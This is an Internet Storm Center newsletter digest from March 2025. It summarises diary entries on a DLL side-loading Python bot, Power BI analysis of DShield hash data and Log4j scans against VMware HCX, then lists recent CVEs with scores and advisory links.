Internet Storm Center Spotlight


INTERNET STORM CENTER SPOTLIGHT

ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html

Python Bot Delivered Through DLL Side-Loading

Published: 2025-03-18

Last Updated: 2025-03-18 09:12:46 UTC

by Xavier Mertens (Version: 1)

One of my hunting rules triggered some suspicious Python code, and, diving deeper, I found an interesting example of DLL side-loading. This technique involves placing a malicious DLL with the same name and export structure as a legitimate DLL in a location the application checks first, causing the application to load the malicious DLL instead of the intended one. This is a classic vulnerability seen for years in many software. The attacker also implemented simple tricks to bypass classic security controls.

The malware is delivered through a ZIP archive: 'Hootsuite<.>zip'. The archive contains some files that have the Hidden protection flag ...

Read the full entry: https://isc.sans.edu/diary/Python+Bot+Delivered+Through+DLL+SideLoading/31778/

File Hashes Analysis with Power BI from Data Stored in DShield SIEM

Published: 2025-03-12

Last Updated: 2025-03-13 00:41:51 UTC

by Guy Bruneau (Version: 1)

I previously used Power BI to analyze DShield sensor data and this time I wanted to show how it could be used by selecting certain type of data as a large dataset and export it for analysis. This time, I ran a query in Elastic Discover and exported that data to analyze it in PowerBI into a CSV format. The first step was to run a query in Discover and select the past 60 days with the following query ...

Next was to export that data in a CSV file: Kibana_Export_CSV

Next step is to import the data into Power BI for analysis. In Power BI, Select Excel workbook and select all files and open the file you exported from Kibana followed by Load. From the interface, start building the visualization you want to analyze.

First, configure the @timestamp to split the date and time by selecting Transform data and right click on the @timestamp to Remove Duplicates to create 2 columns ...

Read the full entry: https://isc.sans.edu/diary/File+Hashes+Analysis+with+Power+BI+from+Data+Stored+in+DShield+SIEM/31764/

Scans for VMWare Hybrid Cloud Extension (HCX) API (Log4j - not brute forcing)

Published: 2025-03-12

Last Updated: 2025-03-12 14:42:07 UTC

by Johannes Ullrich (Version: 1)

Today, I noticed increased scans for the VMWare Hyprid Cloud Extension (HCX) "sessions" endpoint. These endpoints are sometimes associated with exploit attempts for various VMWare vulnerabilities to determine if the system is running the extensions or to gather additional information to aid exploitation.

Initially, based on the URL, I suspected brute forcing. However, after reviewing some complete requests (see below), it turns out that these attempts are exploiting the Log4j vulnerability ...

Read the full entry: https://isc.sans.edu/diary/Scans+for+VMWare+Hybrid+Cloud+Extension+HCX+API+Log4j+not+brute+forcing/31762/

Internet Storm Center Entries


Exploit Attempts for Cisco Smart Licensing Utility CVE-2024-20439 and CVE-2024-20440 (2025.03.19)

https://isc.sans.edu/diary/Exploit+Attempts+for+Cisco+Smart+Licensing+Utility+CVE202420439+and+CVE202420440/31782/

Static Analysis of GUID Encoded Shellcode (2025.03.17)

https://isc.sans.edu/diary/Static+Analysis+of+GUID+Encoded+Shellcode/31774/

Mirai Bot now incorporating (malformed?) DrayTek Vigor Router Exploits (2025.03.16)

https://isc.sans.edu/diary/Mirai+Bot+now+incroporating+malformed+DrayTek+Vigor+Router+Exploits/31770/

Recent CVEs


The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2025-24813 - Apache Tomcat is vulnerable to Path Equivalence leading to Remote Code Execution and/or Information disclosure via the Default Servlet, affecting versions 11.0.0-M1 through 11.0.2, 10.1.0-M1 through 10.1.34, and 9.0.0.M1 through 9.0.98.

Product: Apache Software Foundation Apache Tomcat

CVSS Score: 0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24813

ISC Podcast: https://isc.sans.edu/podcastdetail/9368

CVE-2025-21590 - Juniper Networks Junos OS is vulnerable to improper isolation, allowing a local attacker to compromise device integrity by injecting arbitrary code via the shell.

Product: Juniper Junos

CVSS Score: 4.4

** KEV since 2025-03-13 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-21590

ISC Podcast: https://isc.sans.edu/podcastdetail/9364

NVD References:

- https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers

- https://supportportal.juniper.net/JSA93446

CVE-2025-24983 - Use after free in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.

Product: Microsoft Windows 10 1507

CVSS Score: 7.0

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24983

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24983

CVE-2025-24985 - Integer overflow or wraparound in Windows Fast FAT Driver allows an unauthorized attacker to execute code locally.

Product: Microsoft Windows 10 1507

CVSS Score: 7.8

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24985

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24985

CVE-2025-24993 - Heap-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code locally.

Product: Microsoft Windows 10 1507

CVSS Score: 7.8

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24993

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24993

CVE-2025-26633 - Improper neutralization in Microsoft Management Console allows an unauthorized attacker to bypass a security feature locally.

Product: Microsoft Windows 10 1507

CVSS Score: 7.0

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-26633

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633

CVE-2025-24201 - visionOS, iOS, iPadOS, macOS Sequoia, Safari were vulnerable to an out-of-bounds write issue that could allow malicious web content to break out of the sandbox.

Product: Apple Safari

CVSS Score: 8.8

** KEV since 2025-03-13 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24201

NVD References:

- https://support.apple.com/en-us/122281

- https://support.apple.com/en-us/122283

- https://support.apple.com/en-us/122284

- https://support.apple.com/en-us/122285

CVE-2025-30066 - tj-actions changed-files allows remote attackers to discover secrets by reading actions logs.

Product: tj-actions changed-files

CVSS Score: 8.6

** KEV since 2025-03-18 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-30066

NVD References:

- https://blog.gitguardian.com/compromised-tj-actions/

- https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised/

- https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066/

- https://web.archive.org/web/20250315060250/https://github.com/tj-actions/changed-files/issues/2463

- https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised

- https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066

- https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066

CVE-2025-24984 - Windows NTFS allows unauthorized attackers to disclose sensitive information through log file insertion via physical attack.

Product: Microsoft Windows 10 1507

CVSS Score: 4.6

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24984

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24984

CVE-2025-24991 - Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.

Product: Microsoft Windows 10 1507

CVSS Score: 5.5

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24991

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24991

CVE-2024-56336 - SINAMICS S200 is vulnerable to injection of malicious code or installation of untrusted firmware due to an unlocked bootloader.

Product: Siemens SINAMICS S200

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56336

NVD References: https://cert-portal.siemens.com/productcert/html/ssa-787280.html

CVE-2025-27494 - SiPass integrated AC5102 (ACC-G2) and SiPass integrated ACC-AP devices < V6.4.9 have a vulnerability that could allow a remote administrator to escalate privileges by injecting arbitrary commands.

Product: Siemens SiPass integrated AC5102

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27494

NVD References: https://cert-portal.siemens.com/productcert/html/ssa-515903.html

CVE-2025-27363 - FreeType versions 2.13.0 and below have an out of bounds write vulnerability related to font subglyph structures, potentially leading to arbitrary code execution.

Product: FreeType

CVSS Score: 8.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27363

ISC Podcast: https://isc.sans.edu/podcastdetail/9362

NVD References: https://www.facebook.com/security/advisories/cve-2025-27363

CVE-2025-26701 - Percona PMM Server (OVA) before version 3.0.0-1.ova allows default service account credentials to potentially lead to SSH access, use of Sudo to root, and sensitive data exposure, fixed in later versions.

Product: Percona PMM Server

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-26701

NVD References: https://www.percona.com/blog/security-advisory-cve-affecting-percona-monitoring-and-management-pmm/

CVE-2025-22954 - GetLateOrMissingIssues in C4/Serials.pm in Koha before 24.11.02 allows SQL Injection in /serials/lateissues-export.pl via the supplierid or serialid parameter.

Product: Koha

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-22954

NVD References:

- https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=38829

- https://koha-community.org/koha-24-11-02-released/

CVE-2025-1960 - WebHMI is vulnerable to unauthorized command execution due to an insecure default password and incorrect display of default usernames.

Product: CWE WebHMI

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-1960

NVD References: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-070-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-070-03.pdf

CVE-2025-27407 - graphql-ruby is vulnerable to remote code execution when loading a malicious schema definition in `GraphQL::Schema.from_introspection` prior to versions 1.11.8, 1.12.25, 1.13.24, 2.0.32, 2.1.14, 2.2.17, and 2.3.21.

Product: graphql-ruby Ruby implementation of GraphQL

CVSS Score: 9.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27407

NVD References:

- https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released

- https://github.com/github-community-projects/graphql-client

- https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492

CVE-2025-2263 - Sante PACS Server.exe is vulnerable to a stack-based buffer overflow during login due to a fixed-size buffer used by OpenSSL function EVP_DecryptUpdate.

Product: Sante International Sante PACS Server

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2263

NVD References: https://www.tenable.com/security/research/tra-2025-08

CVE-2025-27593 - SDD Device Drivers are vulnerable to code execution on target systems due to missing download verification checks.

Product: SDD Device Drivers

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27593

NVD References:

- https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF

- https://github.security.telekom.com/2025/03/multiple-vulnerabilities-in-sick-dl100.html

- https://sick.com/psirt

- https://www.cisa.gov/resources-tools/resources/ics-recommended-practices

- https://www.first.org/cvss/calculator/3.1

- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0004.json

- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0004.pdf

CVE-2025-27595 - The device's weak hashing algorithm allows attackers to easily calculate matching passwords, compromising its security and integrity.

Product: D-Link DIR-850L Wireless Router

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27595

NVD References:

- https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF

- https://github.security.telekom.com/2025/03/multiple-vulnerabilities-in-sick-dl100.html

- https://sick.com/psirt

- https://www.cisa.gov/resources-tools/resources/ics-recommended-practices

- https://www.first.org/cvss/calculator/3.1

- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0004.json

- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0004.pdf

CVE-2025-2000 - Qiskit versions 0.18.0 through 1.4.1 are vulnerable to code execution attacks when deserialising maliciously crafted QPY files.

Product: Qiskit QPY

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2000

NVD References: https://www.ibm.com/support/pages/node/7185949

CVE-2025-29029, CVE-2025-29030, CVE-2025-29031 - Tenda AC6 v15.03.05.16 was discovered to contain buffer overflow vulnerabilities

Product: Tenda AC6

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29029

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29030

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29031

NVD References:

- https://github.com/WhereisDoujo/CVE/issues/2

- https://github.com/WhereisDoujo/CVE/issues/3

- https://github.com/WhereisDoujo/CVE/issues/5

CVE-2025-29384, CVE-2025-29385, CVE-2025-29386 - Tenda AC9 v1.0 V15.03.05.14_multi is vulnerable to stack overflow, allowing for remote arbitrary code execution.

Product: Tenda AC9

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29384

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29385

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29386

NVD References:

- https://github.com/shuqi233/loophole/blob/main/Tenda%20AC9/AdvSetMacMtuWan1.md

- https://github.com/shuqi233/loophole/blob/main/Tenda%20AC9/AdvSetMacMtuWan3.md

- https://github.com/shuqi233/loophole/blob/main/Tenda%20AC9/AdvSetMacMtuWan4.md

CVE-2025-2345 - IROAD Dash Cam X5 and Dash Cam X6, up to 20250308, have a very critical vulnerability that allows for remote attacks due to improper authorization.

Product: IROAD Dash Cam X5

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2345

NVD References:

- https://github.com/geo-chen/IROAD/blob/main/README.md#finding-5-managing-settings-to-obtain-sensitive-data-and-sabotaging-car-battery

- https://vuldb.com/?ctiid.299811

- https://vuldb.com/?id.299811

- https://vuldb.com/?submit.516883

CVE-2025-2395 - The U-Office Force from e-Excellence is vulnerable to Unauthorized Access due to an Improper Authentication issue that enables unauthenticated remote attackers to manipulate cookies and gain administrator access.

Product: e-Excellence U-Office Force

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2395

NVD References:

- https://www.twcert.org.tw/en/cp-139-10012-d5bbc-2.html

- https://www.twcert.org.tw/tw/cp-132-10011-3de72-1.html

CVE-2025-25914 - Online Exam Mastering System v.1.0 is vulnerable to SQL injection, allowing remote attackers to execute arbitrary code via the fid parameter.

Product: Online Exam Mastering System Online Exam Mastering System v.1.0

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-25914

NVD References: https://github.com/872323857/CVE/blob/main/online-exam-mastering-system_sqlinject.md

CVE-2024-23943 - Cloud API allows unauthenticated remote attackers to gain access due to a critical function lacking authentication, without affecting availability.

Product: Cisco Cloud API

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-23943

NVD References: https://cert.vde.com/en/advisories/VDE-2024-010

CVE-2023-47539 - FortiMail version 7.4.0 with RADIUS authentication and remote_wildcard enabled allows a remote unauthenticated attacker to bypass admin login.

Product: Fortinet FortiMail

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-47539

NVD References: https://fortiguard.com/psirt/FG-IR-23-439

CVE-2024-8997 - Vestel EVC04 Configuration Interface is vulnerable to SQL Injection through 18.03.2025.

Product: Vestel EVC04 Configuration Interface

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8997

NVD References: https://www.usom.gov.tr/bildirim/tr-25-0070

CVE-2024-56346 - IBM AIX 7.2 and 7.3 nimesis NIM master service allows remote attackers to execute arbitrary commands.

Product: IBM AIX

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56346

NVD References: https://www.ibm.com/support/pages/node/7186621

CVE-2024-56347 - IBM AIX 7.2 and 7.3 nimsh service is vulnerable to remote code execution due to weak SSL/TLS protection.

Product: IBM AIX

CVSS Score: 9.6

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56347

NVD References: https://www.ibm.com/support/pages/node/7186621

CVE-2024-10441 - Synology BeeStation Manager (BSM), Synology DiskStation Manager (DSM), and Synology Unified Controller (DSMUC) are vulnerable to improper encoding or escaping of output, allowing remote attackers to execute arbitrary code.

Product: Synology BeeStation Manager (BSM)

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10441

NVD References:

- https://www.synology.com/en-global/security/advisory/Synology_SA_24_20

- https://www.synology.com/en-global/security/advisory/Synology_SA_24_23

CVE-2024-10442 - Synology Replication Service and Synology Unified Controller (DSMUC) before specified versions allow remote attackers to execute arbitrary code due to an off-by-one error vulnerability.

Product: Synology Replication Service

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10442

NVD References: https://www.synology.com/en-global/security/advisory/Synology_SA_24_22

CVE-2024-11131 - Synology Camera Firmware versions before 1.2.0-0525 may allow remote attackers to execute arbitrary code via unspecified vectors, affecting models BC500, CC400W, and TC500.

Product: Synology Camera Firmware

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11131

NVD References: https://www.synology.com/en-global/security/advisory/Synology_SA_24_24

CVE-2025-28915 - ThemeEgg ToolKit allows for unrestricted upload of dangerous file types, potentially enabling attackers to upload a web shell onto a web server.

Product: ThemeEgg ToolKit

Active Installations: This plugin has been closed as of February 26, 2025 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-28915

NVD References: https://patchstack.com/database/wordpress/plugin/themeegg-toolkit/vulnerability/wordpress-themeegg-toolkit-plugin-1-2-9-arbitrary-file-upload-vulnerability?_s_id=cve

CVE-2024-13446 - The Workreap plugin for WordPress is vulnerable to privilege escalation through account takeover due to inadequate user identity validation, allowing unauthenticated attackers to login as any user or change passwords, including administrators, up to version 3.2.5.

Product: Workreap WordPress

Active Installations: Unknown. Update to version 3.2.6, or a newer patched version

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-13446

NVD References:

- https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454

- https://www.wordfence.com/threat-intel/vulnerabilities/id/78c1308b-0849-4235-b2d6-0b1750a5614f?source=cve

CVE-2024-11284 - The WP JobHunt plugin for WordPress allows unauthenticated attackers to escalate privileges and take over accounts by changing passwords without proper validation, up to version 6.9.

Product: WordPress WP JobHunt plugin

Active Installations: Unknown. No known patch available.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11284

NVD References:

- https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636

- https://www.wordfence.com/threat-intel/vulnerabilities/id/8afe386e-1e4f-4668-8309-6d47dedb008a?source=cve

CVE-2024-11285 - The WP JobHunt plugin for WordPress up to version 7.1 is susceptible to privilege escalation through account takeover, allowing unauthenticated attackers to change users' email addresses and acquire access to their accounts.

Product: WordPress WP JobHunt plugin

Active Installations: Unknown. No known patch available.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11285

NVD References:

- https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636

- https://www.wordfence.com/threat-intel/vulnerabilities/id/0e61c98d-a6f4-4ac0-b9f9-2b936c030413?source=cve

CVE-2024-11286 - The WP JobHunt plugin for WordPress is vulnerable to authentication bypass, allowing unauthenticated attackers to login as any user, including administrators.

Product: WordPress WP JobHunt plugin

Active Installations: Unknown. No known patch available.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11286

NVD References:

- https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636

- https://www.wordfence.com/threat-intel/vulnerabilities/id/91754c4d-a0d0-4d35-a70a-446d2bdf6c73?source=cve

CVE-2024-13824 - The CiyaShop - Multipurpose WooCommerce Theme theme for WordPress is vulnerable to PHP Object Injection in all versions up to 4.19.0, allowing unauthenticated attackers to inject a PHP Object via deserialization of untrusted input in specific functions.

Product: CiyaShop - Multipurpose WooCommerce Theme

Active Installations: Update to version 4.19.1, or a newer patched version

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-13824

NVD References:

- https://themeforest.net/item/ciyashop-responsive-multipurpose-woocommerce-wordpress-theme/22055376#item-description__changelog

- https://www.wordfence.com/threat-intel/vulnerabilities/id/b69c86f4-d81d-4e14-baff-3402008bb9c6?source=cve

CVE-2024-13771 - The Civi - Job Board & Freelance Marketplace WordPress Theme plugin is vulnerable to an authentication bypass allowing attackers to change passwords of users without validation.

Product: CiviThemes Job Board & Freelance Marketplace WordPress Theme

Active Installations: Unknown. No known patch available.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-13771

NVD References:

- http://localhost:1337/wp-content/themes/civi/includes/class-ajax.php#L715

- https://www.wordfence.com/threat-intel/vulnerabilities/id/5ab2c74d-b83b-40ea-951c-83aeb76a7515?source=cve

CVE-2025-2232 - The Realteo - Real Estate Plugin by Purethemes plugin for WordPress, used by the Findeo Theme, has an authentication bypass vulnerability allowing unauthenticated attackers to register an account as an Administrator.

Product: Purethemes Realteo - Real Estate Plugin

Active Installations: Update to version 1.2.9, or a newer patched version

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2232

NVD References:

- https://docs.purethemes.net/findeo/knowledge-base/changelog-findeo/

- https://www.wordfence.com/threat-intel/vulnerabilities/id/abe73ecd-1325-4d6d-8545-d27f6116ca43?source=cve

CVE-2025-1771 - The Traveler theme for WordPress is vulnerable to Local File Inclusion, allowing unauthenticated attackers to execute arbitrary files and potentially obtain sensitive data.

Product: WordPress Traveler theme

Active Installations: Update to version 3.1.9, or a newer patched version

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-1771

NVD References:

- https://travelerwp.com/traveler-changelog/

- https://www.wordfence.com/threat-intel/vulnerabilities/id/da3e3d6c-7643-4f22-aa88-2c4ce80aed1f?source=cve

CVE-2025-26875 - Multiple Shipping And Billing Address For Woocommerce versions up to 1.3 are vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, as identified in silverplugins217.

Product: SilverPlugins Multiple Shipping And Billing Address For Woocommerce

Active Installations: Update to version 1.5 or later to remove the vulnerability.

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-26875

NVD References: https://patchstack.com/database/wordpress/plugin/different-shipping-and-billing-address-for-woocommerce/vulnerability/wordpress-multiple-shipping-and-billing-address-for-woocommerce-plugin-1-3-sql-injection-vulnerability?_s_id=cve